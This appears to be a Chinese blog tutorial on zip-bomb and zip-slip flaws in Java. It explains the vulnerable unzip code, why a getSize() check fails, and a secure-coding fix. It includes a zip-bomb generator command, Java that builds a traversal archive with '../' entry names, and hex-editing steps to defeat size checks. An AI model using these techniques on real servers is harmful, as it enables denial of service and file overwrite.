java学习之zip炸弹攻击

2 篇文章 0 订阅
2 篇文章 0 订阅

一、概述

Zip炸弹是一种特殊类型的Zip文件,它包含了大量的无用数据。Zip文件格式允许使用压缩算法来减小文件的大小,但是如果Zip文件中的某些内容被重复压缩,就会导致文件大小急剧增加。Zip炸弹利用这个特性,将一些无用的数据多次压缩到一个Zip文件中,从而生成一个极其庞大的文件。

当服务器尝试解压缩这个Zip文件时,它需要解压缩所有的内容。由于Zip炸弹中包含了大量的重复数据,这可能会导致服务器耗尽所有的内存和CPU资源,从而导致服务器崩溃或拒绝服务攻击

Zip 炸弹的大致原理是 zip 炸弹文件中有大量刻意重复的数据,这种重复数据在压缩的时候是可以被丢弃的,这也就是压缩后的文件其实并不大的原因。最为典型的 Zip 炸弹就是 42.zip,一个 42KB 的文件,解压完其实是个 4.5 PB(1 PB=1024 TB) 的“炸弹”,详细原理可参见:A better zip bomb

二、工具演示

github上有制作zip炸弹的现成项目:https://github.com/CreeperKong/zipbomb-generator

脚本使用方式:(使用python3)

python zipbomb.py --mode=quoted_overlap --num-files=1 --compressed-size=3999999 > test.zip

--num-files  表示压缩包内文件数目

--compressed-size  表示压缩后大小

如果开始的时候num_files增大的话,其实解压后大小会成倍增加;所以如果服务器接收客户端传过来的zip文件直接进行解压缩而不校验文件夹内部文件的大小的话,将会引发zip炸弹从而耗尽服务器资源,形成Dos攻击。

三、漏洞代码演示

漏洞代码1:(文件名及大小未限制】

ZipBombvul.java

import java.io.BufferedInputStream;
import java.io.BufferedOutputStream;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.util.zip.ZipEntry;
import java.util.zip.ZipInputStream;

public class ZipBombVul {
    // 定义缓冲区大小为512字节
    static final int BUFFER = 512;

    // 解压方法,接收一个文件名作为参数
    public final void unzip(String fileName) throws java.io.IOException {
        // 创建文件输入流对象,读取压缩文件
        FileInputStream fis = new FileInputStream(fileName);
        // 创建压缩输入流对象,用于读取压缩文件中的条目
        ZipInputStream zis = new ZipInputStream(new BufferedInputStream(fis));
        ZipEntry entry;

        // 循环遍历压缩文件中的每个条目
        while ((entry = zis.getNextEntry()) != null) {
            // 打印当前正在解压的条目名
            System.out.println("Extracting:" + entry);

            // 定义变量用于读取数据的计数
            int count;
            // 创建字节数组,用于临时存储读取的数据
            byte data[] = new byte[BUFFER];

            // 创建文件输出流对象,将解压后的文件写入磁盘,文件名使用条目的名字
            FileOutputStream fos = new FileOutputStream(entry.getName());
            // 创建缓冲输出流对象,提高写入性能
            BufferedOutputStream dest = new BufferedOutputStream(fos, BUFFER);

            // 循环读取压缩文件中的数据,并写入到解压后的文件中
            while ((count = zis.read(data, 0, BUFFER)) != -1) {
                dest.write(data, 0, count);
            }

            // 刷新缓冲区,确保所有数据都被写入磁盘
            dest.flush();
            // 关闭缓冲输出流
            dest.close();
            // 关闭当前条目的压缩流
            zis.closeEntry();
        }

        // 关闭压缩输入流
        zis.close();
    }


}

bombTest.java

import java.io.IOException;

public class bombTest {
    public static void main(String[] args) throws IOException {
        ZipBombVul  bombvul = new ZipBombVul();
        String filename = "./src/test.zip";//要解压的文件名
        bombvul.unzip(filename);

    }
}

运行上述生成的解压代码,磁盘以及内存利用率升高

路径穿越代码演示:

zipBomb.java

import java.io.FileOutputStream;
import java.io.IOException;
import java.util.zip.ZipEntry;
import java.util.zip.ZipOutputStream;

public class zipBomb {
    public static void main(String[] args) {
        try {
            // 创建一个Zip输出流
            FileOutputStream fos = new FileOutputStream("zip_bomb2.zip");
            ZipOutputStream zos = new ZipOutputStream(fos);

            // 添加大量的重复文件
            for (int i = 0; i < 2; i++) {
                //生成自定义的文件名,做路径穿越测试
                String fileName = "../" + i + ".txt";
                ZipEntry entry = new ZipEntry(fileName);
                zos.putNextEntry(entry);
                // 写入大量的重复数据(10MB)
                byte[] data = new byte[10 * 1024 * 1024];
                zos.write(data);
                zos.closeEntry();
            }

            // 关闭Zip输出流
            zos.close();
            System.out.println("Zip bomb created successfully!");
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}

漏洞代码2(错误的修复:使用getSize()方法)

zipbombVul.java

import java.io.BufferedInputStream;
import java.io.BufferedOutputStream;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.util.zip.ZipEntry;
import java.util.zip.ZipInputStream;
public static final int BUFFER = 512; // 定义缓冲区大小为 512 字节
public static final int TOOBIG = 0x6400000; // 最大文件大小为 100MB

public final void unzip(String filename) throws java.io.IOException {
    // 打开要解压的文件
    FileInputStream fis = new FileInputStream(filename);
    // 创建 ZipInputStream 对象,用于读取 Zip 文件
    ZipInputStream zis = new ZipInputStream(new BufferedInputStream(fis));
    ZipEntry entry;
    try {
        // 循环遍历 Zip 文件中的每个条目
        while ((entry = zis.getNextEntry()) != null) {
            // 打印当前正在解压的条目
            System.out.println("Extracting: " + entry);
            int count;
            byte data[] = new byte[BUFFER]; // 创建缓冲区数组,用于读取数据
            // 如果文件过大,抛出异常
            if (entry.getSize() > TOOBIG) {
                throw new IllegalStateException("File to be unzipped is huge.");
            }
            // 如果文件大小为 -1,可能是一个巨大的文件,抛出异常
            if (entry.getSize() == -1) {
                throw new IllegalStateException("File to be unzipped might be huge.");
            }
            // 创建文件输出流,准备将解压后的数据写入磁盘
            FileOutputStream fos = new FileOutputStream(entry.getName());
            BufferedOutputStream dest = new BufferedOutputStream(fos, BUFFER);
            // 读取并写入数据,直到文件结束
            while ((count = zis.read(data, 0, BUFFER)) != -1) {
                dest.write(data, 0, count);
            }
            // 刷新并关闭输出流
            dest.flush();
            dest.close();
            // 关闭当前 ZipEntry 条目
            zis.closeEntry();
        }
    } finally {
        // 最终关闭 ZipInputStream
        zis.close();
    }
}

上述代码中,使用了getsize获取压缩包中文件条目大小

压缩大小(compressed size)指的是文件在压缩包内的大小,也就是文件被压缩后的大小。未压缩大小(uncompressed size)指的是文件在解压缩后的大小,即原始文件的大小。在 Java 中,ZipEntry 中的 getSize 方法获取的是未压缩大小,而 setCompressedSize 方法用于设置压缩大小。

举个例子,假设有一个 1MB 大小的文件,在将其添加到 ZIP 压缩包时,可以选择是否对该文件进行压缩。如果选择进行压缩,该文件在 ZIP 压缩包内的大小可能会减小到 500KB(假设压缩比是 50%)。在这种情况下,文件的压缩大小就是 500KB,而未压缩大小仍然是 1MB。

虽然这里使用getsize判断文件大小,但是实际上可以伪造ZIP文件中用来描述解压条目大小的字段,因此,getSize()方法的返回值是不可靠的,本地资源实际仍可能被过度消耗

绕过步骤:

下载用于修改二进制文件的 010editor 软件,安装后打开上面演示用的 Zip包,修改其中属性值

现在去解压,就不会报文件太大的错误了

值得注意的是,从上述截图也可以看到修改了 zip 文件的 frUncompressedsize 字段的值以后,解压缩 zip 文件会报错,如果直接使用 7-zip 进行解压缩的话有报错但是可以提取文件

但是通过实践也可以看到,通过上述 Java 代码可成功解压缩出来目标文件,这样子的话就不影响我们通过修改 zip 文件的 frUncompressedsize 字段的值,制作 zip 炸弹绕过服务端的文件大小校验检测,完成攻击利用。

小结:这个错误示例调用ZipEntry.getSize()方法在解压提取一个条目之前判断其大小,以试图解决之前的问题。但不幸的是,恶意攻击者可以伪造ZIP文件中用来描述解压条目大小的字段,因此,getSize()方法的返回值是不可靠的,本地资源实际仍可能被过度消耗;同时依旧没有检测文件名。

四、安全编码

参照《OpenHarmony-Java-secure-coding-guide

private static final long MAX_FILE_COUNT = 100L;
private static final long MAX_TOTAL_FILE_SIZE = 1024L * 1024L;

...

public void unzip(FileInputStream zipFileInputStream, String dir) throws IOException {
    long fileCount = 0;
    long totalFileSize = 0;

    try (ZipInputStream zis = new ZipInputStream(zipFileInputStream)) {
        ZipEntry entry;
        String entryName;
        String entryFilePath;
        File entryFile;
        byte[] buf = new byte[10240];
        int length;

        while ((entry = zis.getNextEntry()) != null) {
            entryName = entry.getName();
            //检验文件名合法性
            entryFilePath = sanitizeFileName(entryName, dir);
            entryFile = new File(entryFilePath);
            
            //判断条目是否是目录
            if (entry.isDirectory()) {
                creatDir(entryFile);
                continue;
            }
            
            //文件数+1,比较文件数是否大于指定的最大条目数
            fileCount++;
            if (fileCount > MAX_FILE_COUNT) {
                throw new IOException("The ZIP package contains too many files.");
            }

            try (FileOutputStream fos = new FileOutputStream(entryFile)) {
                while ((length = zis.read(buf)) != -1) {
                    totalFileSize += length;
                    //此处不再同通过zipEntry.getSize()函数获取 zip 文件大小,而是通过文件数据流直接读取整个文件的数据并统计大小
                    zipBombCheck(totalFileSize);
                    fos.write(buf, 0, length);
                }
            }
        }
    }
}

//用于处理文件名,确保文件路径的安全性
private String sanitizeFileName(String fileName, String dir) throws IOException {
    // 创建一个 File 对象,表示解压目标目录下的目标文件
    File file = new File(dir, fileName);
    // 获取文件的规范路径
    String canonicalPath = file.getCanonicalPath();
    // 检查规范路径是否以目标目录为前缀,如果是,则表示路径合法
    if (canonicalPath.startsWith(dir)) {
        return canonicalPath;
    }
    // 如果规范路径不以目标目录为前缀,抛出异常,表示路径不安全
    throw new IOException("Path Traversal vulnerability: ...");
}

//创建目录
private void creatDir(File dirPath) throws IOException {
    boolean result = dirPath.mkdirs();
    if (!result) {
        throw new IOException("Create dir failed, path is : " + dirPath.getPath());
    }
    ...
}

//用于检查 ZIP 炸弹攻击,即解压缩后文件总大小是否超出限制
private void zipBombCheck(long totalFileSize) throws IOException {
    if (totalFileSize > MAX_TOTAL_FILE_SIZEG) {
        throw new IOException("Zip Bomb! The size of the file extracted from the ZIP package is too large.");
    }
}

五、总结

1、检查压缩包内的文件名,是否包含非法字符

2、禁止使用zipEntry.getSize()方法获取zip文件大小

3、校验解压缩出来的文件总数(设置阈值,即使文件小但是数量大依旧可完成zip炸弹)

六、参考链接

JavaWeb解压缩漏洞之ZipSlip与Zip炸弹_zip slip-CSDN博客

docs/zh-cn/contribute/OpenHarmony-Java-secure-coding-guide.md at ce85f3d8e4d055bcaab25548612c17f63de86091 · openharmony/docs · GitHub

代码审计指南 | security

  • 28
    点赞
  • 24
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值